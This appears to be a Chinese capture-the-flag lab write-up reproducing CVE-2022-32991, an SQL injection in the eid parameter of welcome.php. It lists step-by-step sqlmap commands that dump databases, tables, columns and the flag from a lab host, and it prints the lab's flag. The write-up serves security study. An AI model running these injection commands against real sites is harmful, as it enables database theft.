春秋云境:CVE-2022-32991[漏洞复现]

从CVE官网查询该漏洞相关信息

该漏洞是由于welcome.php中的eid参数包含了SQL注入漏洞

则我们的目标就在于寻找welcome.php地址以及相关的可注入eid参数


开启靶机

先在页面正常注册、登录一个账号。密码随便填

进入了home目录,这里有三个话题可以选择开启

随便选择一个进行开启点击Start即可

进入后查看网页URL

可以看到这里的URL地址就出现了welcome.php和eid参数


使用自动化工具SQLMAP漏洞利用

爆库:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch --dbs

拿到了四个数据库,继续选择ctf库进行爆表


爆表:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf --tables

再继续爆列:sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag --columns

最后查看flag里面的内容: sqlmap -u 'http://eci-2zefpkb9jv5uvskqpxyu.cloudeci1.ichunqiu.com/welcome.php?q=quiz\&step=2\&eid=5b141f1e8399e\&n=1\&t=10' -p 'eid' --batch -D ctf -T flag -C flag --dump


flag{3b46abc2-3846-417c-84ae-49b54dfdeb7b}

相关推荐
为几何欢4 小时前
【hackmyvm】soul靶机wp
安全·网络安全·渗透·hackmyvm·hmv
Dovir多多10 小时前
Python数据处理——re库与pydantic的使用总结与实战,处理采集到的思科ASA防火墙设备信息
网络·python·计算机网络·安全·网络安全·数据分析
Clockwiseee12 小时前
RCE常见姿势
安全·web安全·网络安全
学习溢出19 小时前
【网络安全】John the Ripper 散列密码,PDF密码
安全·网络安全·pdf·哈希算法
为几何欢19 小时前
【hackmymv】emma靶机wp
安全·网络安全·渗透·hackmyvm·hmv
士别三日wyx21 小时前
HW护网分析研判思路,流量告警分析技巧
安全·web安全·网络安全
茶颜悦色vv1 天前
Wireshark(1)
网络·web安全·网络安全·wireshark
纯净的灰〃1 天前
vulnhub-matrix-breakout-2-morpheus
安全·web安全·网络安全
愿得一人欣1 天前
工具大全-dirsearch探测Web目录
网络安全·ctf比赛工具·渗透工具大全